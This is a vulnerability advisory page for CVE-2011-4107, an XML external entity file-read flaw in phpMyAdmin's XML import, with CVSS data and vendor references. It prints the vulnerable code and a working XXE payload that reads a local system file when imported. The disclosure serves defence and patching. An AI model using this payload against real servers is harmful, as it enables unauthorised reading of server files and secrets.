Bug: phpMyAdmin Arbitrary File Read ( Ascii Version )

Search:
WLB2

phpMyAdmin Arbitrary File Read

Published
Credit
Risk
2011.11.21
80sec
Low
CWE
CVE
Local
Remote
CWE-200
CVE-2011-4107
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

Hi

80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network

in libraries/import/xml.php,some code like this


/**

* Load the XML string

*

* The option LIBXML_COMPACT is specified because it can

* result in increased performance without the need to

* alter the code in any way. It's basically a freebee.

*/

$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);

unset($buffer);



/**

* The XML was malformed

*/

if ($xml === FALSE) {

so you just need to make a xml like this

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">

<!--

- Structure schemas

-->

<pma:structure_schemas>

<pma:database name="test" collation="utf8_general_ci"
charset="utf8">

<pma:table name="ts_ad">

&hi80sec;

</pma:table>

</pma:database>

</pma:structure_schemas>



<!--

- &#202;&#190;&#191;: 'thinksns'

-->

<database name="thinksns">

<!-- &#177; ts_ad -->

</database>

</pma_xml_export>

then import this xml in PhpMyAdmin,you will get the content you want.

From:http://www.wooyun.org/bugs/wooyun-2010-03185

:)

References:

http://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php
https://bugzilla.redhat.com/show_bug.cgi?id=751112
http://xforce.iss.net/xforce/xfdb/71108
http://www.wooyun.org/bugs/wooyun-2010-03185
http://www.securityfocus.com/bid/50497
http://secunia.com/advisories/46447
http://seclists.org/fulldisclosure/2011/Nov/21
http://packetstormsecurity.org/files/view/106511/phpmyadmin-fileread.txt
http://osvdb.org/76798

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version